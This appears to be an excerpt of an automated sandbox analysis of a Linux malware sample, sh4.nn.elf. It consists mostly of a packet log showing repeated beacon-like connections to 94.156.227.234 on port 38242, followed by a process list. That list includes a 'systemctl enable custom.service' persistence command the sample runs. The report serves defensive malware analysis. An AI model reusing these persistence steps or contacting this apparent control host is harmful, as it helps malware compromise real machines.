                                                                                                    Dec 24, 2024 06:29:02.620515108 CET382426011294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:03.009527922 CET6011238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:03.172756910 CET382426011294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:03.617149115 CET382426011294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:03.617350101 CET6011238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:04.011586905 CET6011438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:04.132030964 CET382426011494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:04.132601023 CET6011438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:04.132601023 CET6011438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:04.252357006 CET382426011494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:04.641673088 CET6011438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:04.804708958 CET382426011494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:05.262393951 CET382426011494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:05.262689114 CET6011438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:05.643657923 CET6011638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:05.763391972 CET382426011694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:05.763767958 CET6011638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:05.763767958 CET6011638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:05.883583069 CET382426011694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:06.269236088 CET6011638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:06.432665110 CET382426011694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:06.900621891 CET382426011694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:06.900918007 CET6011638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:07.270920038 CET6011838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:07.390799046 CET382426011894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:07.390948057 CET6011838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:07.391134977 CET6011838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:07.510781050 CET382426011894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:07.899658918 CET6011838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:08.064729929 CET382426011894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:08.524852037 CET382426011894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:08.525100946 CET6011838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:08.902025938 CET6012038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:09.022705078 CET382426012094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:09.022813082 CET6012038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:09.023052931 CET6012038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:09.143739939 CET382426012094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:09.529443979 CET6012038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:09.692728043 CET382426012094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:10.149300098 CET382426012094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:10.149563074 CET6012038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:10.531538010 CET6012238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:10.652077913 CET382426012294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:10.652328014 CET6012238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:10.652380943 CET6012238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:10.773107052 CET382426012294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:11.157155991 CET6012238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:11.320650101 CET382426012294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:11.770178080 CET382426012294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:11.770428896 CET6012238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:12.159310102 CET6012438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:12.279100895 CET382426012494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:12.279335976 CET6012438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:12.279335976 CET6012438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:12.399151087 CET382426012494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:12.787353992 CET6012438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:12.948611021 CET382426012494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:13.407295942 CET382426012494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:13.407582998 CET6012438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:13.789362907 CET6012638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:13.909086943 CET382426012694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:13.909272909 CET6012638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:13.909272909 CET6012638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:14.029046059 CET382426012694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:14.415945053 CET6012638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:14.580858946 CET382426012694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:15.036930084 CET382426012694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:15.037353039 CET6012638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:15.418301105 CET6012838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:15.538135052 CET382426012894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:15.538387060 CET6012838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:15.538388014 CET6012838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:15.658324957 CET382426012894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:16.046710014 CET6012838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:16.208648920 CET382426012894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:17.049184084 CET6013038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:17.079855919 CET382426012894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:17.079902887 CET382426012894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:17.080049992 CET6012838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:17.080049992 CET6012838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:17.168927908 CET382426013094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:17.169116974 CET6013038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:17.169116974 CET6013038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:17.199688911 CET382426012894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:17.288775921 CET382426013094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:17.676637888 CET6013038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:17.836796999 CET382426013094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:18.281611919 CET382426013094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:18.281838894 CET6013038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:18.678534031 CET6013238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:18.798283100 CET382426013294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:18.798387051 CET6013238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:18.798568964 CET6013238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:18.918353081 CET382426013294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:19.306128979 CET6013238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:19.468599081 CET382426013294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:19.926063061 CET382426013294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:19.926351070 CET6013238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:20.308588982 CET6013438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:20.428459883 CET382426013494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:20.428564072 CET6013438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:20.428752899 CET6013438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:20.548311949 CET382426013494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:20.936100006 CET6013438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:21.100601912 CET382426013494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:21.549021006 CET382426013494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:21.549269915 CET6013438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:21.938657045 CET6013638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:22.058568001 CET382426013694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:22.058693886 CET6013638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:22.058753967 CET6013638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:22.178518057 CET382426013694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:22.566963911 CET6013638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:22.728535891 CET382426013694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:23.189165115 CET382426013694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:23.189409971 CET6013638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:23.568928003 CET6013838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:23.688752890 CET382426013894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:23.689024925 CET6013838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:23.689024925 CET6013838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:23.808947086 CET382426013894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:24.196386099 CET6013838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:24.360589027 CET382426013894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:24.818846941 CET382426013894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:24.819150925 CET6013838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:25.198385000 CET6014038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:25.318389893 CET382426014094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:25.318902016 CET6014038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:25.318902016 CET6014038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:25.438721895 CET382426014094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:25.828118086 CET6014038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:25.988828897 CET382426014094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:26.453200102 CET382426014094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:26.453452110 CET6014038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:26.830055952 CET6014238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:26.950809002 CET382426014294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:26.951080084 CET6014238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:26.951168060 CET6014238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:27.070930958 CET382426014294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:27.461255074 CET6014238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:27.628796101 CET382426014294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:28.089360952 CET382426014294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:28.089759111 CET6014238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:28.464229107 CET6014438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:28.584386110 CET382426014494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:28.584806919 CET6014438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:28.585000992 CET6014438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:28.704974890 CET382426014494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:29.100240946 CET6014438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:29.260534048 CET382426014494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:29.725604057 CET382426014494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:29.726022005 CET6014438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:30.102266073 CET6014638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:30.222218037 CET382426014694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:30.222476006 CET6014638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:30.222886086 CET6014638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:30.342541933 CET382426014694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:30.741046906 CET6014638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:30.904861927 CET382426014694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:31.359539032 CET382426014694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:31.359956980 CET6014638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:31.743875027 CET6014838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:31.863723040 CET382426014894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:31.864171028 CET6014838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:31.864171028 CET6014838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:31.984103918 CET382426014894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:32.376446009 CET6014838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:32.536657095 CET382426014894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:32.980664968 CET382426014894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:32.980993032 CET6014838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:33.378927946 CET6015038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:33.498879910 CET382426015094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:33.499208927 CET6015038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:33.499208927 CET6015038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:33.618993044 CET382426015094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:34.008898020 CET6015038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:34.176749945 CET382426015094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:34.627397060 CET382426015094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:34.627698898 CET6015038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:35.011650085 CET6015238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:35.131788015 CET382426015294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:35.132040024 CET6015238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:35.132040024 CET6015238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:35.251872063 CET382426015294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:35.641913891 CET6015238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:35.804651976 CET382426015294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:36.260448933 CET382426015294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:36.260673046 CET6015238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:36.644841909 CET6015438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:36.764573097 CET382426015494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:36.764830112 CET6015438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:36.764830112 CET6015438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:36.888194084 CET382426015494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:37.273221970 CET6015438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:37.436552048 CET382426015494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:37.902235031 CET382426015494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:37.902522087 CET6015438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:38.275369883 CET6015638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:38.395252943 CET382426015694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:38.395390987 CET6015638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:38.395549059 CET6015638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:38.515155077 CET382426015694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:38.904789925 CET6015638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:39.072565079 CET382426015694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:39.517260075 CET382426015694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:39.517549992 CET6015638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:39.907357931 CET6015838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:40.027149916 CET382426015894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:40.027334929 CET6015838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:40.027563095 CET6015838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:40.147109032 CET382426015894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:40.535062075 CET6015838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:40.696559906 CET382426015894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:41.143346071 CET382426015894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:41.143609047 CET6015838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:41.543239117 CET6016038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:41.662961960 CET382426016094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:41.663091898 CET6016038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:41.663146019 CET6016038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:41.782741070 CET382426016094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:42.170861959 CET6016038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:42.332545996 CET382426016094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:42.800008059 CET382426016094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:42.800188065 CET6016038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:43.173429012 CET6016238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:43.293422937 CET382426016294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:43.293656111 CET6016238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:43.293656111 CET6016238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:43.413306952 CET382426016294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:43.801333904 CET6016238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:43.964503050 CET382426016294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:44.416484118 CET382426016294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:44.416713953 CET6016238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:44.803729057 CET6016438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:44.923567057 CET382426016494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:44.923790932 CET6016438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:44.923790932 CET6016438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:45.043637037 CET382426016494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:45.431685925 CET6016438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:45.592441082 CET382426016494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:46.061125994 CET382426016494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:46.061317921 CET6016438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:46.433372021 CET6016638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:46.553349972 CET382426016694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:46.553520918 CET6016638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:46.553574085 CET6016638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:46.673938990 CET382426016694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:47.061218023 CET6016638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:47.224519968 CET382426016694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:47.672163010 CET382426016694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:47.672389984 CET6016638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:48.063596010 CET6016838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:48.183815002 CET382426016894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:48.183985949 CET6016838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:48.184053898 CET6016838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:48.303908110 CET382426016894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:48.692013025 CET6016838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:48.856642008 CET382426016894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:49.299174070 CET382426016894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:49.299381018 CET6016838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:49.693931103 CET6017038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:49.813705921 CET382426017094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:49.814050913 CET6017038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:49.814052105 CET6017038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:49.933828115 CET382426017094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:50.326703072 CET6017038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:50.488706112 CET382426017094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:50.947650909 CET382426017094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:50.947863102 CET6017038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:51.329237938 CET6017238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:51.449407101 CET382426017294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:51.449733973 CET6017238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:51.449840069 CET6017238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:51.570194960 CET382426017294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:51.959971905 CET6017238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:52.120372057 CET382426017294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:52.572336912 CET382426017294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:52.572936058 CET6017238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:52.963162899 CET6017438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:53.083342075 CET382426017494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:53.083915949 CET6017438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:53.083916903 CET6017438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:53.203927040 CET382426017494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:53.590538025 CET6017438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:53.752321959 CET382426017494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:54.207753897 CET382426017494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:54.207958937 CET6017438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:54.592212915 CET6017638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:54.711956024 CET382426017694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:54.712105036 CET6017638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:54.712158918 CET6017638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:54.832442999 CET382426017694.156.227.234192.168.2.23

                                                                                                    System Behavior

                                                                                                    Start time (UTC):05:27:46
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/usr/bin/dash
                                                                                                    Arguments:-
                                                                                                    File size:129816 bytes
                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                    Start time (UTC):05:27:46
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/usr/bin/rm
                                                                                                    Arguments:rm -f /tmp/tmp.upQr27eWjM /tmp/tmp.3jzKS2POjU /tmp/tmp.3e5IeyVG3c
                                                                                                    File size:72056 bytes
                                                                                                    MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                                                    Start time (UTC):05:27:46
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/usr/bin/dash
                                                                                                    Arguments:-
                                                                                                    File size:129816 bytes
                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                    Start time (UTC):05:27:46
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/usr/bin/rm
                                                                                                    Arguments:rm -f /tmp/tmp.upQr27eWjM /tmp/tmp.3jzKS2POjU /tmp/tmp.3e5IeyVG3c
                                                                                                    File size:72056 bytes
                                                                                                    MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                                                    Start time (UTC):05:27:48
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/tmp/sh4.nn.elf
                                                                                                    Arguments:/tmp/sh4.nn.elf
                                                                                                    File size:4139976 bytes
                                                                                                    MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                                                                                                    Start time (UTC):05:27:48
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/tmp/sh4.nn.elf
                                                                                                    Arguments:-
                                                                                                    File size:4139976 bytes
                                                                                                    MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                                                                                                    Start time (UTC):05:27:48
                                                                                                    Start date (UTC):24/12/2024
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:sh -c "systemctl enable custom.service >/dev/null 2>&1"
                                                                                                    File size:129816 bytes
                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

